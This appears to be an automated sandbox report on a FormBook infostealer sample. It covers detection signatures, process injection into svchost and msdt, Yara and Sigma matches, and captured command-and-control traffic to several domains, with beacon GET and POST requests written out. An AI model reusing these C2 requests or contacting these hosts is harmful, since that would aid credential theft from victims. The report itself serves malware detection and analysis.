
Windows Analysis Report
santi.exe

Overview

General Information

Sample name: santi.exe
Analysis ID: 1561742
MD5: c086de804062f1c6ebf2e42057187b24
SHA1: 8f57ba2121877ecae5a800b28f2fc89421485d1f
SHA256: a538495e66f9396821392539284e4752ef3569f1d1f7b592cb438908b6c93efa
Tags: exe, Formbook, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • santi.exe (PID: 6336 cmdline: "C:\Users\user\Desktop\santi.exe" MD5: C086DE804062F1C6EBF2E42057187B24)
    • svchost.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\santi.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • lavilIyGJqg.exe (PID: 1292 cmdline: "C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • msdt.exe (PID: 7696 cmdline: "C:\Windows\SysWOW64\msdt.exe" MD5: BAA4458E429E7C906560FE4541ADFCFB)
          • lavilIyGJqg.exe (PID: 520 cmdline: "C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7960 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps (Source, Rule, Description, Author):
  • 0000000B.00000002.3128767729.0000000000410000.00000040.80000000.00040000.00000000.sdmp, JoeSecurity_FormBook_1, Yara detected FormBook, Joe Security
  • 0000000C.00000002.3132349262.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, JoeSecurity_FormBook_1, Yara detected FormBook, Joe Security
  • 0000000B.00000002.3131908170.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, JoeSecurity_FormBook_1, Yara detected FormBook, Joe Security
  • 00000007.00000002.1716707325.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, JoeSecurity_FormBook_1, Yara detected FormBook, Joe Security
  • 0000000A.00000002.3132089430.00000000051D0000.00000040.00000001.00040000.00000000.sdmp, JoeSecurity_FormBook_1, Yara detected FormBook, Joe Security

Yara matches in unpacked PE files (Source, Rule, Description, Author):
  • 7.2.svchost.exe.6f0000.0.unpack, JoeSecurity_FormBook_1, Yara detected FormBook, Joe Security
  • 7.2.svchost.exe.6f0000.0.raw.unpack, JoeSecurity_FormBook_1, Yara detected FormBook, Joe Security

System Summary

Sigma rule matches:
  • Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\santi.exe", CommandLine: "C:\Users\user\Desktop\santi.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\santi.exe", ParentImage: C:\Users\user\Desktop\santi.exe, ParentProcessId: 6336, ParentProcessName: santi.exe, ProcessCommandLine: "C:\Users\user\Desktop\santi.exe", ProcessId: 7296, ProcessName: svchost.exe
  • Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\santi.exe", CommandLine: "C:\Users\user\Desktop\santi.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\santi.exe", ParentImage: C:\Users\user\Desktop\santi.exe, ParentProcessId: 6336, ParentProcessName: santi.exe, ProcessCommandLine: "C:\Users\user\Desktop\santi.exe", ProcessId: 7296, ProcessName: svchost.exe

Suricata IDS alerts:
  • Timestamp: 2024-11-24T08:35:06.513368+0100, SID: 2856318, Severity: 1, Classtype: A Network Trojan was detected, Source IP: 192.168.2.7, Source Port: 49849, Destination IP: 104.18.73.116, Destination Port: 80, Protocol: TCP

AV Detection

Source: santi.exe, ReversingLabs: Detection: 60%
Source: santi.exe, Virustotal: Detection: 47%
Source: Yara match, File source: 7.2.svchost.exe.6f0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.svchost.exe.6f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000B.00000002.3128767729.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.3132349262.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.3131908170.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.1716707325.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.3132089430.00000000051D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.1717464893.0000000005D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.3132346426.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.1716909243.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: santi.exe, Joe Sandbox ML: detected
Source: santi.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: msdt.pdbGCTL, source: svchost.exe, 00000007.00000003.1684331959.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1684439953.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, lavilIyGJqg.exe, 0000000A.00000003.1654470150.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb, source: lavilIyGJqg.exe, 0000000A.00000002.3129958967.00000000009CE000.00000002.00000001.01000000.00000005.sdmp, lavilIyGJqg.exe, 0000000C.00000000.1798745572.00000000009CE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP, source: santi.exe, 00000000.00000003.1274830080.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, santi.exe, 00000000.00000003.1292502476.0000000003840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1717067620.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1717067620.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1624933286.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1623193414.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000003.1717001856.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000003.1719316907.000000000455B000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3132861268.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3132861268.0000000004710000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb, source: santi.exe, 00000000.00000003.1274830080.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, santi.exe, 00000000.00000003.1292502476.0000000003840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000002.1717067620.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1717067620.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1624933286.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1623193414.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, msdt.exe, 0000000B.00000003.1717001856.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000003.1719316907.000000000455B000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3132861268.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3132861268.0000000004710000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb, source: msdt.exe, 0000000B.00000002.3133665309.0000000004D3C000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 0000000B.00000002.3129214060.0000000000582000.00000004.00000020.00020000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3133057463.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2038827866.000000000A32C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP, source: msdt.exe, 0000000B.00000002.3133665309.0000000004D3C000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 0000000B.00000002.3129214060.0000000000582000.00000004.00000020.00020000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3133057463.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2038827866.000000000A32C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: msdt.pdb, source: svchost.exe, 00000007.00000003.1684331959.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1684439953.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, lavilIyGJqg.exe, 0000000A.00000003.1654470150.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\santi.exe, Code function: 0_2_00326CA9 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\santi.exe, Code function: 0_2_003260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\santi.exe, Code function: 0_2_003263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\santi.exe, Code function: 0_2_0032EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\santi.exe, Code function: 0_2_0032F56F FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\santi.exe, Code function: 0_2_0032F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\santi.exe, Code function: 0_2_00331B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\santi.exe, Code function: 0_2_00331C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\santi.exe, Code function: 0_2_00331F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_0042C730 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 4x nop then xor eax, eax (11_2_00419DF0)
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 4x nop then pop edi (11_2_0041E409)
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 4x nop then mov ebx, 00000004h (11_2_043A04E8)

Networking

Source: Network traffic, Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.7:49849 -> 104.18.73.116:80
Source: Joe Sandbox View, IP Address: 104.18.73.116
Source: Joe Sandbox View, IP Address: 13.248.169.48
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (10 occurrences)
Source: C:\Users\user\Desktop\santi.exe, Code function: 0_2_00334EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic, HTTP traffic detected:
    GET /lqir/?Yh8=pl0prhRpj&jp30l4Dh=1XT9/+lPoo+/65GBoLqjY96keXaDBPxKxMdORwDZG72wNLr1ipw6qktNsrB2GbsuFZNPMrA1oNmR/zLhPkjCxZ4ItMmlXe/h8K4U/QJ8SGl7q4T2nCxnDw61Qoew6MKI2b3ZeSUeI0MH HTTP/1.1
    Host: www.n-vis.group
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Source: global traffic, HTTP traffic detected:
    GET /uktz/?jp30l4Dh=jNuUE2eCt+zgeohBMbDMHsqNn0wVhHBnwmF+Aig1D6FjejDgzRRVUK7OGNxnjSLQN1yhaag00jsMis21NrITlQ8QyNNGCDeGdcegpNSZIk91cHVmbCJEIOdZhDE81ZlXIOxVN2wvJFBl&Yh8=pl0prhRpj HTTP/1.1
    Host: www.losmason.shop
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Source: global traffic, HTTP traffic detected:
    GET /o7bo/?jp30l4Dh=rSNp7HYcuB/095ykRTgGSysZZq4Xde7QSp6ZurvXibSiMmwLx7Dds9OPAwuR2izgPvluyMujHD+7ybxpuR33pblwowpnCmWgEXw5Rhc3WsmHQKO6UjX33qMhz5kj31YRr7iTj/VwMpww&Yh8=pl0prhRpj HTTP/1.1
    Host: www.dialagiaja18.buzz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Source: global traffic, HTTP traffic detected:
    GET /vje0/?jp30l4Dh=PgD0irRMU+WxztOGjHePrbo3+M5iw7Ze2+IGg2QLz7FMOzLFiXmHtGXqLFzGr5U9fZcqMpJpM7Axvujr/nFFAt85qKucOsoTOMySmy/TDo/wbifdtV6BKdCVmh/j8KvjULR4B+cyoPSP&Yh8=pl0prhRpj HTTP/1.1
    Host: www.395608.men
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Source: global traffic, HTTP traffic detected:
    GET /zd1g/?jp30l4Dh=HKtf7if1wssFCwsMZKrQBqjHrNWMjveBtffsr+YOEAp7lFw99HVIkLojFbUmNxvgDUS8qVNfPxg+hDfTlsysjjiIjpBTY2hB1FuC/Ir2XG7/Tel/P9K0Q44ikc2AwKvVyevXJzSbTSZU&Yh8=pl0prhRpj HTTP/1.1
    Host: www.gkfundeis.net
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Source: global traffic, HTTP traffic detected:
    GET /ryxy/?jp30l4Dh=5nP22pW/HG819Fng1Mz7yNOWgr5NC2Ij4byTmEdiR9nhSI/SzfeElgFcrUzbpmknLrIGF7midHkQ4cZuPV+EIZllAsQAC3VF+SNvWHYn95kn9m51zzgbYIlZAQB9dsTK/N+poNP3vY+X&Yh8=pl0prhRpj HTTP/1.1
    Host: www.incgruporxat.click
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Source: global traffic, HTTP traffic detected:
    GET /oeev/?Yh8=pl0prhRpj&jp30l4Dh=4Bj9/uaylYDlcNOhP3Vjy2LihZ6nT7QmD+N2KgHLZ82DvRBjhSjv88Mhc+F1FP6p7OjlEaHQXhlUBbSPr8yFpnLDL5BtGuLJV14GqWSwkNfFdanhR1yYduJIVu+RZBYfQm093zpAcY8s HTTP/1.1
    Host: www.holytur.net
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Source: global traffic, HTTP traffic detected:
    GET /qp0h/?jp30l4Dh=PUKWIHREPS7WoV9Y7jBwDAi8MdJvbPlJZ9RV9HOL13mBnPAwzQgZHDWQnYS4lWYAxPM5HQ5Ne4pDukEiRp2IEMb3TN5ZVyBIh4N3fT3PNmVkN2Qc3E0TfDZCxTFFsCUQYSNOCPRw5FgL&Yh8=pl0prhRpj HTTP/1.1
    Host: www.lirio.shop
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Source: global traffic, DNS traffic detected: DNS query: www.n-vis.group
Source: global traffic, DNS traffic detected: DNS query: www.losmason.shop
Source: global traffic, DNS traffic detected: DNS query: www.dialagiaja18.buzz
Source: global traffic, DNS traffic detected: DNS query: www.395608.men
Source: global traffic, DNS traffic detected: DNS query: www.gkfundeis.net
Source: global traffic, DNS traffic detected: DNS query: www.incgruporxat.click
Source: global traffic, DNS traffic detected: DNS query: www.holytur.net
Source: global traffic, DNS traffic detected: DNS query: www.lirio.shop
Source: global traffic, DNS traffic detected: DNS query: www.espiritismo.info
Source: unknown, HTTP traffic detected:
    POST /uktz/ HTTP/1.1
    Host: www.losmason.shop
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Origin: http://www.losmason.shop
    Referer: http://www.losmason.shop/uktz/
    Content-Length: 221
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: max-age=0
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
    Data Ascii: jp30l4Dh=uPG0HG2Vv+DebPlyDbX9RfCpsFMmw2t4ynFlDzQUOpBsEhPmkBVNdJfgCLheiSzlC3GkMMpKxgQPqMuoPPwKv1hF+PZAODOfQrWbvZ6LHRVDASxqGRNsF6MBgUErzPp7P8dGFVICRXczr6CdbeIUkOAs63vseZL4XculB7JrqbGFPM0TscGozAw+m4u5E5UytXQwt4jFNrf3mFPSYw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:35:21 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 
20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:35:24 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 
